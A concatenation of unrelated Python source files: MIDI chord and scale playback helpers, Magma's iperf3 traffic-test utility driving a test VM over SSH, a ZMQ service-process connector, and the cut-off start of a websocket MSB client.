saveManualJson(manualDict)
return manualDict
def saveManualJson(manualDict):
with open(K_MANUAL_JSON_PATH, 'w', encoding='utf-8') as wf:
json.dump(manualDict, wf, indent=4, sort_keys=True)
def runFuncAsyncThread(target_func, args):
try:
t = threading.Thread(target=target_func, args=args)
t.start()
except Exception as e:
myLogger(traceback.format_exc())
myLogger(str(e))
|
midi.py
|
import mido
from time import sleep
from scipy.signal import medfilt
import random
import threading
C = 60
G = 55
A = 57
F = 53
NOTES = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
def midi_number_to_note(number):
octave = number // len(NOTES) - 1
note = NOTES[number % len(NOTES)]
return note + str(octave)
# some example using mido from
# https://natespilman.com/blog/playing-chords-with-mido-and-python/
def note(note, velocity=64, time=2):
"""
note: midi note
velocity: "how fast the note was struck or released" - dynamic
channel: 0..15
time: "not included in the encoded message"
"""
message = mido.Message("note_on", note=note, velocity=velocity, time=time)
return message
def note_off(note, velocity=64, time=2):
return mido.Message("note_off", note=note, velocity=velocity, time=time)
def major_chord(root, outport, velocity=64, duration=0.2):
"""Major chord from the root note"""
if root + 7 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 7, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 7, velocity))
def minor_chord(root, outport, velocity=64, duration=0.2):
"""Minor chord based on the root node"""
if root + 7 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 7, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 7, velocity))
def major_seventh(root, outport, velocity=64, duration=0.2):
"""Major seventh chord based on root node"""
if root + 11 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 7, velocity))
outport.send(note(root + 11, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 7, velocity))
outport.send(note_off(root + 11, velocity))
def minor_seventh(root, outport, velocity=64, duration=0.2):
"""Minor seventh chord based on root node"""
if root + 10 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 7, velocity))
outport.send(note(root + 10, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 7, velocity))
outport.send(note_off(root + 10, velocity))
def dom_seventh(root, outport, velocity=64, duration=0.2):
"""Dominate seventh chord based on root node"""
if root + 10 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 7, velocity))
outport.send(note(root + 10, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 7, velocity))
outport.send(note_off(root + 10, velocity))
def dim_seventh(root, outport, velocity=64, duration=0.2):
"""diminished seventh chord based on root node"""
if root + 9 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 6, velocity))
outport.send(note(root + 9, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 6, velocity))
outport.send(note_off(root + 9, velocity))
def half_dim_seventh(root, outport, velocity=64, duration=0.2):
"""half diminished seventh chord based on root node"""
if root + 10 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 6, velocity))
outport.send(note(root + 10, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 6, velocity))
outport.send(note_off(root + 10, velocity))
def aug_seventh(root, outport, velocity=64, duration=0.2):
"""augmented seventh chord based on root node"""
if root + 11 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 8, velocity))
outport.send(note(root + 11, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 8, velocity))
outport.send(note_off(root + 11, velocity))
def fifths(root, outport, velocity=64, duration=0.2):
"""Stacking fifths harmony that are aboved the root note"""
for i in range(25):
if root + i * 7 > 127:
break
outport.send(note(root + i * 7, velocity))
sleep(duration)
for i in range(25):
if root + i * 7 > 127:
break
outport.send(note_off(root + i * 7, velocity))
def fifth_scale(root, outport, velocity=64, duration=0.1):
"""Stacking fifths scale that are aboved the root note"""
for i in range(25):
if root + i * 7 > 127:
break
outport.send(note(root + i * 7, velocity))
sleep(0.1)
outport.send(note_off(root + i * 7, velocity))
def fourths(root, outport, velocity=64, duration=0.2):
"""Stacking fourths harmony that are aboved the root note"""
for i in range(25):
if root + i * 5 > 127:
break
outport.send(note(root + i * 5, velocity))
sleep(duration)
for i in range(25):
if root + i * 5 > 127:
break
outport.send(note_off(root + i * 5, velocity))
def fourth_scale(root, outport, velocity=64, duration=0.1):
"""Stacking fourths scale that are aboved the root note"""
for i in range(25):
if root + i * 5 > 127:
break
outport.send(note(root + i * 5, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note_off(root + i * 5, velocity))
def fourth_scale_down(root, outport, velocity=64, duration=0.1):
"""Downward fourths scale that are aboved the root note"""
for i in range(25):
if root - i * 5 < 0:
break
outport.send(note(root - i * 5, velocity))
sleep(random.randint(1, 10)/100)
# outport.send(note_off(root - i * 5, velocity))
sleep(random.randint(1, 30)/100)
def fifth_scale_down(root, outport, velocity=64, duration=0.1):
"""Stacking fifths scale that are aboved the root note"""
for i in range(25):
if root - i * 7 < 0:
break
outport.send(note(root - i * 7, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note_off(root - i * 7, velocity))
sleep(random.randint(1, 20)/100)
def transpose(root, outport, velocity=64, duration=0.1, transpose_range=9, delay_time=2):
"""play and transpose"""
create_thread(root, outport, velocity, duration)
sleep(delay_time)
root = int(root + transpose_range)
create_thread(root, outport, velocity, duration)
def inverse(root, outport, velocity=64, duration=0.1, octave=1, delay_time=2):
"""play and transpose"""
inverted = (root // len(NOTES) - 1) * 12 + 11 - root % len(NOTES)
create_thread(root, outport, velocity, duration)
sleep(delay_time)
root = int(inverted - octave * 12)
create_thread(root, outport, velocity, duration)
def flip(root, outport, velocity=64, duration=0.1, axis=60, delay_time=2):
"""play and flip"""
create_thread(root, outport, velocity, duration)
sleep(delay_time)
root = int(2 * axis - root)
create_thread(root, outport, velocity, duration)
def triad_octave(root, outport, velocity=64, duration=0.1):
for i in range(10):
if root - i * 7 - 5 < 0:
break
# dom_seventh(root + i * 12, velocity)
outport.send(note(root - i * 7, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note(root - i * 7, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note(root - i * 7 - 5, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note(root - i * 7 - 5, velocity))
sleep(0.2)
sleep(random.randint(1, 10)/100)
outport.send(note_off(root + i * 7, velocity))
def create_thread(midinote, outport, velocity, elapsed):
thread = threading.Thread(
target=play, args=(midinote, outport, velocity, elapsed)
)
thread.start()
def play(root, outport, velocity=64, duration=3):
print(f"Pitch: {midi_number_to_note(root)} {velocity})")
if root >= 0 & root <= 127:
outport.send(note(root, velocity))
if duration < 2:
duration = 2
sleep(duration)
outport.send(note_off(root, velocity))
# midi to note example from https://github.com/justinsalamon/
# audio_to_midi_melodia/blob/master/audio_to_midi_melodia.py
def midi_to_notes(midi, fs, hop, smooth, minduration):
# smooth midi pitch sequence first
if smooth > 0:
filter_duration = smooth # in seconds
filter_size = int(filter_duration * fs / float(hop))
if filter_size % 2 == 0:
filter_size += 1
midi_filt = medfilt(midi, filter_size)
else:
midi_filt = midi
# print(len(midi),len(midi_filt))
notes = []
p_prev = None
duration = 0
onset = 0
for n, p in enumerate(midi_filt):
if p == p_prev:
duration += 1
else:
# treat 0 as silence
if p_prev > 0:
# add note
duration_sec = duration * hop / float(fs)
# only add notes that are long enough
if duration_sec >= minduration:
onset_sec = onset * hop / float(fs)
notes.append((onset_sec, duration_sec, p_prev))
# start new note
onset = n
duration = 1
p_prev = p
|
traffic_util.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import copy
import ctypes
import ipaddress
import os
import shlex
import socket
import subprocess
import threading
import iperf3
import pyroute2
import s1ap_types
from util.traffic_messages import (
TrafficMessage,
TrafficRequest,
TrafficRequestType,
TrafficResponseType,
TrafficTestInstance,
)
# Tests shouldn't take longer than a few minutes
TRAFFIC_TEST_TIMEOUT_SEC = 180
# For verify function to run properly, setting 5 sec less iperf data timeout
IPERF_DATA_TIMEOUT_SEC = TRAFFIC_TEST_TIMEOUT_SEC - 5
"""
Using TrafficUtil
=================
TrafficUtil is designed to have one main entry point: generate_traffic_test.
This function sets up the necessary legwork to configuring the trfgen framework
in the S1AP tester and generating a TrafficTest object that represents the
configurations and constraints of the traffic that is to be generated.
Once generated, the TrafficTest object can be run -- either directly with the
start() function or as a context, using the `with' keyword. The wait() function
gives the tester the option to wait on the test completing before continuing.
Essentially, TrafficUtil is just a bridge for packaging together the parameters
of a given test. Once packaged, the actual testing is done via the TrafficTest
API.
"""
class TrafficUtil(object):
"""Utility wrapper for tests requiring traffic generation"""
# Trfgen library setup
_trfgen_lib_name = "libtrfgen.so"
_trfgen_tests = ()
# This is set to True if the data traffic fails with some error
# and leaving behind running iperf3 server(s) in TRF server VM
need_to_close_iperf3_server = False
# Traffic setup
_remote_ip = ipaddress.IPv4Address("192.168.129.42")
def __init__(self):
"""Initialize the trfgen library and its callbacks"""
# _test_lib is the private variable containing the ctypes reference to
# the trfgen library.
self._test_lib = None
self._init_lib()
# _config_test is the private variable containing the ctypes reference
# to the trfgen_configure_test() function in trfgen. This function is
# called to inform the S1AP tester of the parameters of a test suite,
# and is used to pass along configuration options to the tester.
self._config_test = None
self._setup_configure_test()
# _start_test is the private variable containing the ctypes reference
# to the trfgen_start_test() function in trfgen. This function is
# called to begin a single trfgen instance on a given address, using
# the predefined configuration options set with configure_test().
self._start_test = None
self._setup_start_test()
# We collect references to the data we pass into ctypes to prevent
# Python's garbage collection system from coming in and cleaning up the
# memory used, which can result in unspecified behavior.
self._data = ()
# Configuration for triggering shell commands in TRF server VM
self._cmd_data = {
"user": "vagrant",
"host": "192.168.60.144",
"password": "vagrant",
"command": "test",
}
self._command = (
"sshpass -p {password} ssh "
"-o UserKnownHostsFile=/dev/null "
"-o StrictHostKeyChecking=no "
"{user}@{host} {command}"
)
def exec_command(self, command):
"""
Run a command remotely on magma_trfserver VM.
Args:
command: command (str) to be executed on remote host
e.g. 'sed -i \'s/str1/str2/g\' /usr/local/bin/traffic_server.py'
Returns:
Shell command execution output
"""
data = self._cmd_data
data["command"] = '"' + command + '"'
param_list = shlex.split(self._command.format(**data))
return subprocess.call(
param_list,
shell=False,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
def update_dl_route(self, ue_ip_block):
"""Update downlink route in TRF server"""
ret_code = self.exec_command(
"sudo ip route flush via 192.168.129.1 && sudo ip route "
"replace " + ue_ip_block + " via 192.168.129.1 dev eth2",
)
return ret_code == 0
def close_running_iperf_servers(self):
"""Close running Iperf3 servers in TRF server VM"""
ret_code = self.exec_command(
"pidof iperf3 && pidof iperf3 | xargs sudo kill -9",
)
return ret_code == 0
def _init_lib(self):
"""Initialize the trfgen library by loading in binary compiled from C
"""
lib_path = os.environ["S1AP_TESTER_ROOT"]
lib = os.path.join(lib_path, "bin", TrafficUtil._trfgen_lib_name)
os.chdir(lib_path)
self._test_lib = ctypes.cdll.LoadLibrary(lib)
self._test_lib.trfgen_init()
def _setup_configure_test(self):
"""Set up the call to trfgen_configure_test
The function prototype is:
void trfgen_configure_test(int test_id, struct_test test_parms)
This function call caches the test configurations specified in the
struct to be called upon and run from the S1AP tester binary.
"""
self._config_test = self._test_lib.trfgen_configure_test
self._config_test.restype = None
self._config_test.argtypes = (ctypes.c_int32, s1ap_types.struct_test)
def _setup_start_test(self):
"""Set up the call to trfgen_start_test
The function prototype is:
void trfgen_start_test(
int test_id, char *host_ip, char *bind_ip, char *host_port)
This function provides a configuration ID and bind address to the S1AP
tester for it to start a trfgen test. This function returns practically
immediately, as the iperf3 process is called on a separate fork.
"""
self._start_test = self._test_lib.trfgen_start_test
self._start_test.restype = None
self._start_test.argtypes = (
ctypes.c_int,
ctypes.c_char_p,
ctypes.c_char_p,
ctypes.c_char_p,
)
def cleanup(self):
"""Cleanup the dll loaded explicitly so the next run doesn't reuse the
same globals as ctypes LoadLibrary uses dlopen under the covers"""
# self._test_lib.dlclose(self._test_lib._handle)
if TrafficUtil.need_to_close_iperf3_server:
print("Closing all the running Iperf3 servers and forked processes")
if not self.close_running_iperf_servers():
print("Failed to stop running Iperf3 servers in TRF Server VM")
self._test_lib.cleaningAllProcessIds()
self._test_lib = None
self._data = None
def configure_test(self, is_uplink, duration, is_udp):
"""Return the test configuration index for the configurations
provided. This is the index that is in the trfgen internal state. If a
configuration is new, will attempt to create a new one in trfgen
Args:
is_uplink (bool): uplink if True, downlink if False
duration (int): test duration, in seconds
is_udp (bool): use UDP if True, TCP if False
Returns:
An int, the index of the test configuration in trfgen, a.k.a.
the test_id
Raises:
MemoryError: if return test index would exceed
s1ap_types.MAX_TEST_CFG
"""
test = s1ap_types.struct_test()
test.trfgen_type = (
s1ap_types.trfgen_type.CLIENT.value
if is_uplink
else s1ap_types.trfgen_type.SERVER.value
)
test.traffic_type = (
s1ap_types.trf_type.UDP.value
if is_udp
else s1ap_types.trf_type.TCP.value
)
test.duration = duration
test.server_timeout = duration
# First we see if this test has already been configured. If so, just
# reuse that configuration
for t in self._trfgen_tests:
if (
t.trfgen_type == test.trfgen_type
and t.traffic_type == test.traffic_type
and t.duration == test.duration
and t.server_timeout == test.server_timeout
):
return t.test_id
# Otherwise, we just create the new test
if s1ap_types.MAX_TEST_CFG >= len(self._trfgen_tests):
test.test_id = len(self._trfgen_tests)
self._trfgen_tests += (test,)
self._config_test(test.test_id, test)
return test.test_id
# If we get here, then we've reached the limit on the number of tests
# that we can configure, so send an error. Eventually, come up with an
# eviction scheme
raise MemoryError(
"Reached limit on number of configurable tests: %d"
% s1ap_types.MAX_TEST_CFG,
)
def generate_traffic_test(
self,
ips,
is_uplink=False,
duration=120,
is_udp=False,
):
"""Create a TrafficTest object for the given UE IPs and test type
Args:
ips: (list(ipaddress.ip_address)): the IP addresses of the UEs to
which to connect
is_uplink: (bool): whether to do an uplink test. Defaults to False
duration: (int): duration, in seconds, of the test. Defaults to 120
is_udp: (bool): whether to use UDP. If False, uses TCP. Defaults to
False
Returns:
A TrafficTest object, which is used to interact with the
trfgen test
"""
test_id = self.configure_test(is_uplink, duration, is_udp)
instances = tuple(
TrafficTestInstance(is_uplink, is_udp, duration, ip, 0)
for ip in ips
)
return TrafficTest(self._start_test, instances, (test_id,) * len(ips))
class TrafficTest(object):
"""Class for representing a trfgen test with which to interact
This is the class that directly interacts with the TrafficTestServer via a
socketed connection, when the test starts (i.e. the "client" for the
"server").
"""
_alias_counter = 0
_alias_lock = threading.Lock()
_iproute = pyroute2.IPRoute()
_net_iface = "eth2"
_port = 7000
_port_lock = threading.Lock()
# Remote iperf3 superserver (IP, port) tuple. Port 62462 is chosen because
# 'MAGMA' translates to 62462 on a 12-key phone pad
_remote_server = ("192.168.60.144", 62462)
def __init__(self, test_runner, instances, test_ids):
"""Create a new TrafficTest object for running the test instance(s)
with the associated test_ids
Ports will be assigned when the test is run by communicating with the
test server responsible for iperf3 test servers
Args:
test_runner: the ctypes hook into the traffic gen trfgen_start_test
function
instances: (list(TrafficTestInstance)): the instances to run
test_ids: (list(int)): the associated trfgen test configuration
indices; must be the same length as instances
"""
assert len(instances) is len(test_ids)
self._done = threading.Event()
self._instances = tuple(instances)
self._results = None # Cached list(iperf3.TestResult) objects
self._runner = test_runner
self._test_ids = tuple(test_ids)
self._test_lock = threading.RLock() # Provide mutex between tests
self.is_trf_server_connection_refused = False
def __enter__(self):
"""Start execution of the test"""
self.start()
return self
def __exit__(self, *_):
"""Wait for test to end"""
self.wait()
@staticmethod
def _get_port():
"""Return the next port for testing"""
with TrafficTest._port_lock:
TrafficTest._port += 1
return TrafficTest._port
@staticmethod
def _iface_up(ip):
"""Brings up an iface for the given IP
Args:
ip (ipaddress.ip_address): the IP address to use for bringing up
the iface
Returns:
The iface name with alias that was brought up
"""
# Generate a unique alias
with TrafficTest._alias_lock:
TrafficTest._alias_counter += 1
net_iface = TrafficTest._net_iface
alias = TrafficTest._alias_counter
net_alias = "%s:UE%d" % (net_iface, alias)
# Bring up the iface alias
net_iface_index = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)[0]
TrafficTest._iproute.addr(
"add",
index=net_iface_index,
label=net_alias,
address=ip.exploded,
)
return net_alias
@staticmethod
def _network_from_ip(ip, mask_len):
"""Return the ipaddress.ip_network with the given mask that contains
the given IP address
Args:
ip (ipaddress.ip_address): the IP address for which we want to find
the network
mask_len (int): the number of bits to mask
Returns:
An ipaddress.ip_network; works agnostic to IPv4 or IPv6
"""
# Convert to int to make bit shifting easier
ip_int = int.from_bytes(ip.packed, "big") # Packed is big-endian
ip_masked = ipaddress.ip_address(ip_int >> mask_len << mask_len)
# Compute the appropriate prefix length
prefix_len = ip.max_prefixlen - mask_len
return ipaddress.ip_network("%s/%d" % (ip_masked.exploded, prefix_len))
def _run(self):
"""Run the traffic test
Sets up traffic test with remote traffic server and local ifaces, then
runs the runner hook into the trfgen binary and collects the results to
cache
Will block until the test ends
"""
# Create a snapshot of the test's states, in case they get changed or
# wiped in a later operation. Basically, render tests immune to later
# operations after the test has started.
with self._test_lock:
self.instances = copy.deepcopy(self._instances)
test_ids = copy.deepcopy(self._test_ids)
try:
# Set up sockets and associated streams
self.sc = socket.create_connection(self._remote_server)
self.sc_in = self.sc.makefile("rb")
self.sc_out = self.sc.makefile("wb")
self.sc.settimeout(IPERF_DATA_TIMEOUT_SEC)
# Flush all the addresses left by previous failed tests
net_iface_index = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)[0]
for instance in self.instances:
TrafficTest._iproute.flush_addr(
index=net_iface_index,
address=instance.ip.exploded,
)
# Set up network ifaces and get UL port assignments for DL
aliases = ()
for instance in self.instances:
aliases += (TrafficTest._iface_up(instance.ip),)
if not instance.is_uplink:
# Assign a local port for the downlink UE server
instance.port = TrafficTest._get_port()
# Create and send TEST message
msg = TrafficRequest(
TrafficRequestType.TEST,
payload=self.instances,
)
msg.send(self.sc_out)
# Receive SERVER message and update test instances
msg = TrafficMessage.recv(self.sc_in)
assert msg.message is TrafficResponseType.SERVER
r_id = msg.id # Remote server test identifier
server_instances = msg.payload # (TrafficServerInstance, ...)
# Locally keep references to arguments passed into trfgen
num_instances = len(self.instances)
args = [None for _ in range(num_instances)]
# Post-SERVER, pre-START logic
for i in range(num_instances):
instance = self.instances[i]
server_instance = server_instances[i]
# Add ip network route
net_iface_index = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)[0]
server_instance_network = TrafficTest._network_from_ip(
server_instance.ip,
8,
)
TrafficTest._iproute.route(
"replace",
dst=server_instance_network.exploded,
iif=net_iface_index,
oif=net_iface_index,
scope="link",
)
# Add arp table entry
os.system(
"/usr/sbin/arp -s %s %s"
% (
server_instance.ip.exploded,
server_instance.mac,
),
)
if instance.is_uplink:
# Port should be the port of the remote for uplink
instance.port = server_instance.port
else:
args[i] = self._run_test(
test_ids[i],
server_instance.ip,
instance.ip,
instance.port,
)
# Send START for the given r_id
msg = TrafficRequest(
TrafficRequestType.START,
identifier=r_id,
)
msg.send(self.sc_out)
# Wait for STARTED response
msg = TrafficMessage.recv(self.sc_in)
assert msg.message is TrafficResponseType.STARTED
assert msg.id == r_id
# Post-STARTED, pre-RESULTS logic
for i in range(num_instances):
instance = self.instances[i]
if instance.is_uplink:
args[i] = self._run_test(
test_ids[i],
server_instances[i].ip,
instance.ip,
server_instances[i].port,
)
# Wait for RESULTS message
msg = TrafficMessage.recv(self.sc_in)
assert msg.message is TrafficResponseType.RESULTS
assert msg.id == r_id
results = msg.payload
# Call cleanup to close network interfaces and open sockets
self.cleanup()
# Cache results after cleanup
with self._test_lock:
self._results = results
except ConnectionRefusedError as e:
print("Running iperf data failed. Error: " + str(e))
self.is_trf_server_connection_refused = True
except socket.timeout:
print("Running iperf data failed with timeout")
TrafficUtil.need_to_close_iperf3_server = True
self.cleanup()
except Exception as e:
print("Running iperf data failed. Error: " + str(e))
TrafficUtil.need_to_close_iperf3_server = True
self.cleanup()
finally:
# Signal that we're done
self._done.set()
def _run_test(self, test_id, host_ip, ue_ip, port):
"""Run the test at the given index by calling the test runner on the
test parameters for the instance at the given index and port
Args:
test_id (int): the trfgen configuration index to use
host_ip (ipaddress.ip_address): the remote iperf3 server's IP
address [-c, for uplink]
ue_ip (ipaddress.ip_address): the local UE's IP address to which to
bind [-B]
port (int): the UE's port (downlink) or the remote server's port
(uplink) [-p]
Returns:
The raw arguments passed into the trfgen binary, for the caller
to keep track of and avoid garbage collection
"""
args = (
test_id,
host_ip.exploded.encode(),
ue_ip.exploded.encode(),
str(port).encode(),
)
self._runner(*args)
return args
@staticmethod
def combine(test, *tests):
"""Combine TrafficTest objects to produce a single test object that
will run the parameters given in the tests all at the same time
All tests in the argument will become unrunnable, as their instances
will be stripped!
Args:
test: (TrafficTest): a test, included to force at least one test to
be passed as an argument
tests: (list(TrafficTest)): any remaining tests to combine
Returns:
A single TrafficTest that will run all the instances together
"""
runner = test._runner
tests = (test,) + tests
instances = ()
test_ids = ()
for test in tests:
with test._test_lock:
instances += test._instances
test_ids += test._test_ids
# Now disable the test from later runs
test._instances = ()
test._test_ids = ()
# Create and return the new test
return TrafficTest(runner, instances, test_ids)
@property
def results(self):
"""Return the traffic results data"""
return self._results
def start(self):
"""Start this test by spinning off runner thread"""
self._done.clear()
threading.Thread(target=self._run).start()
def verify(self):
"""Verify the results of this test
Raises:
RuntimeError: if any tests returned with an error message
"""
self.wait()
with self._test_lock:
if self.is_trf_server_connection_refused:
raise RuntimeError("Failed to connect to TRF Server")
if not isinstance(self.results, tuple):
if not self._done.is_set():
TrafficUtil.need_to_close_iperf3_server = True
self._done.set()
self.cleanup()
raise RuntimeError(
"Cached results object is not a tuple : {0}".format(
self.results,
),
)
for result in self.results:
if not isinstance(result, iperf3.TestResult):
raise RuntimeError(
"Cached results are not iperf3.TestResult objects",
)
if result.error:
TrafficUtil.need_to_close_iperf3_server = True
# iPerf dumps out-of-order packet information on stderr,
# ignore these while verifying the test results
if "OUT OF ORDER" not in result.error:
raise RuntimeError(result.error)
def wait(self):
"""Wait for this test to complete"""
self._done.wait(timeout=TRAFFIC_TEST_TIMEOUT_SEC)
def cleanup(self):
"""Cleanup sockets and network interfaces"""
# Signal to end connection
msg = TrafficRequest(TrafficRequestType.EXIT)
msg.send(self.sc_out)
# Close out network ifaces
net_iface = TrafficTest._iproute.link_lookup(
ifname=TrafficTest._net_iface,
)
if net_iface:
net_iface_index = net_iface[0]
# For some reason the first call to flush this address flushes all
# the addresses brought up during testing. But subsequent flushes
# do nothing if the address doesn't exist
for instance in self.instances:
TrafficTest._iproute.flush_addr(
index=net_iface_index,
address=instance.ip.exploded,
)
# Do socket cleanup
self.sc_in.close()
self.sc_out.close()
self.sc.shutdown(socket.SHUT_RDWR) # Ensures safe socket closure
self.sc.close()
|
service_connector.py
|
'''
service_connector.py
ancilla
Created by Kevin Musselman (kevin@frenzylabs.com) on 01/26/20
Copyright 2019 FrenzyLabs, LLC.
'''
import logging
import sys
import time
import zmq
import importlib
import os
import json
import struct # for packing integers
from zmq.eventloop.zmqstream import ZMQStream
import asyncio
# from multiprocessing import Process, Pipe
import multiprocessing as mp
from .response import AncillaResponse, AncillaError
from .request import Request
from .base_service import BaseService
from ..utils.service_json_encoder import ServiceJsonEncoder
from .service_process import ServiceProcess
import resource, gc, signal
global SEQ_ID
SEQ_ID = 0
class ServiceConnector():
def __init__(self, service, handler, **kwargs):
processCtx = mp.get_context('spawn')
self.service = service
self.name_identity = service.encoded_name
self.identity = service.identity #f"service{self.service.model.id}".encode('ascii')
self.loop = None
self.router_address = None
self.rpc_router = None
self.process_event_stream = None
self.requests = {}
self.ctx = zmq.Context()
self.rpc, self.child_conn = mp.Pipe()
self.p = processCtx.Process(target=ServiceProcess.start_process, args=(self.identity, self.service.model.id, self.child_conn, handler))
def start(self, *args):
print(f'Start Process {self.p}')
self.p.start()
self.setup_queue()
def stop(self, *args):
print(f'Stop Process 1')
self.rpc.send(("stop", ""))
cnt = 10
while cnt > 0:
res = self.rpc.poll(1)
if res:
tada = self.rpc.recv()
break
cnt -= 1
self.p.join(2)
# self.p.terminate()
self.p = None
print(f'Stopped Process')
if self.rpc_router:
self.rpc_router.close()
if self.process_event_stream:
self.process_event_stream.flush()
self.process_event_stream.close()
def setup_queue(self):
rpc_router = self.ctx.socket(zmq.ROUTER)
waitcnt = 100
while waitcnt > 0 and not self.is_alive():
time.sleep(0.1)
waitcnt -= 1
time.sleep(0.5)
router_address = self.get_router_address()
rpc_router.connect(router_address)
self.rpc_router = ZMQStream(rpc_router)
self.rpc_router.on_recv(self.router_message)
self.pubsub_address = self.get_pubsub_address()
process_event_stream = self.ctx.socket(zmq.SUB)
process_event_stream.connect(self.pubsub_address)
self.process_event_stream = ZMQStream(process_event_stream)
self.process_event_stream.linger = 0
self.process_event_stream.on_recv(self.on_process_event)
self.process_event_stream.setsockopt(zmq.SUBSCRIBE, b'events')
def is_alive(self, *args):
return (self.p and self.p.is_alive())
def get_router_address(self):
self.rpc.send(("router_address", ""))
(key, val) = self.rpc.recv()
self.router_address = val
return self.router_address
def get_pubsub_address(self):
self.rpc.send(("pubsub_address", ""))
(key, val) = self.rpc.recv()
self.pubsub_address = val
return self.pubsub_address
def update_model(self):
self.rpc.send(("model_updated", ""))
# (key, val) = self.rpc.recv()
# self.pubsub_address = val
# return self.pubsub_address
def on_process_event(self, msg):
# print(f"CAM PUBSUB Msg = {msg}", flush=True)
topic, identity, *res = msg
if topic.startswith(b'data'):
topic = self.service.identity + b'.' + topic
if topic.startswith(b'events.state'):
try:
newstate = json.loads(res[0].decode('utf-8'))
self.service.state.update(newstate)
except:
pass
nmsg = [topic, self.service.identity] + res
# print(f"Process evt: {nmsg}")
self.service.pusher.send_multipart(nmsg)
def router_message(self, msg):
# print(f"Router Result = {msg}", flush=True)
ident, seq, payload = msg
if seq in self.requests:
self.requests[seq].set_result(payload)
async def make_request(self, request):
global SEQ_ID
SEQ_ID += 1
seq_s = struct.pack('!q', SEQ_ID)
loop = asyncio.get_running_loop()
# Create a new Future object.
fut = loop.create_future()
self.requests[seq_s] = fut
renc = request.encode()
self.rpc_router.send_multipart([self.identity, seq_s, renc])
res = await fut
try:
del self.requests[seq_s]
res = json.loads(res.decode('utf-8'))
classname = res.get('__class__')
module_name, class_name = classname.rsplit(".", 1)
MyClass = getattr(importlib.import_module(module_name), class_name)
if hasattr(MyClass, "decode"):
res = MyClass.decode(res.get('data', {}))
else:
res = MyClass(res.get('data', {}))
except Exception as e:
print('Exception')
raise AncillaError(400, str(e))
if isinstance(res, AncillaError):
raise res
return res
|
MsbClient.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019 Fraunhofer Institute for Manufacturing Engineering and Automation (IPA)
Authors: Daniel Stock, Matthias Stoehr
Licensed under the Apache License, Version 2.0
See the file "LICENSE" for the full license governing this code.
"""
import websocket, threading, json, jsonschema, jsonpickle, ssl, time, uuid, os, logging
from random import randint
import datetime
from .Event import Event
from .ComplexDataFormat import ComplexDataFormat
from .Function import Function
from .DataFormat import getDataType
class MsbClient(websocket.WebSocketApp):
"""Definition of the msb client to handle the creation of the self-description
and communication with the msb websocket interface.
"""
def __init__(
self,
service_type=None,
uuid=None,
name=None,
description=None,
token=None,
applicationPropertiesCustomPath=None
):
"""Initializes a new msb client.
If no parameters are provided an application.properties file with the main configuration needs to be present.
Otherwise the config data can be provided as constructor parameters
Args:
service_type (str): The service type of the service ('Application' or 'SmartObject')
uuid (str): The uuid of the service as valid V4 UUID
name (str): The name of the service
description (str): The description of the service
token (str): The token of the service used to verify service via MSB GUI or Rest
Returns:
MsbClient: The msb client object to specify the service and handle MSB connection
"""
self.msb_url = ""
self.msb_url_with_wspath = ""
self.applicationPropertiesCustomPath = applicationPropertiesCustomPath
# debugging
self.debug = False
self.trace = False
self.dataFormatValidation = True
# connection params
self.connected = False
self.registered = False
self.autoReconnect = True
self.reconnecting = False
self.userDisconnect = False
self.reconnectInterval = 10
# client-side heartbeats
self.keepAlive = False
self.heartbeat_interval = 8
# sockJs framing
self.sockJsFraming = True
# event caching
self.eventCache = []
self.eventCacheEnabled = True
self.eventCacheSize = 1000
self.maxMessageSize = 1000000
# smart object definition
self.functions = {}
self.events = {}
self.configuration = {}
self.configuration["parameters"] = {}
# // socket
self.ws = None
self.hostnameVerification = False
self.threadAsDaemonEnabled = False
# check if all params are present or if the application.properties file will be used
if (service_type or uuid or name or description or token) is not None:
self.service_type = service_type
self.uuid = uuid
self.name = name
self.description = description
self.token = token
else:
self.readConfig()
# used for serialization and deserialization of complex Python objects
jsonpickle.set_encoder_options("json", sort_keys=False, indent=4)
jsonpickle.set_preferred_backend("json")
# list of all valid MSB message types
MSBMessageTypes = [
"IO",
"NIO",
